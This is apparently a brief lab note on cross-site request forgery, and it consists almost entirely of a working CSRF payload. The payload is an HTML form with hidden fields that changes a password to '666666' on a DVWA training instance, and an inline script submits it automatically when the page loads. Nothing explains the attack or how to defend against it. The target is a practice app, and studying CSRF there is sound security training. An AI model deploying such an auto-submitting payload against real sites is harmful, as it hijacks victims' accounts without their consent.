CSRF (Cross-site requests forgery)
Last updated
Last updated
<form id=form1 action="http://192.168.1.1/dvwa/vulnerabilities/csrf/" method="GET"><br>
<input type="hidden" autocomplete="off" name="password_new" value="666666">
<input type="hidden" autocomplete="off" name="password_conf" value="666666">
<input type="hidden" value="Change" name="Change">
</form>
<script>document.getElementById('form1').submit();</script>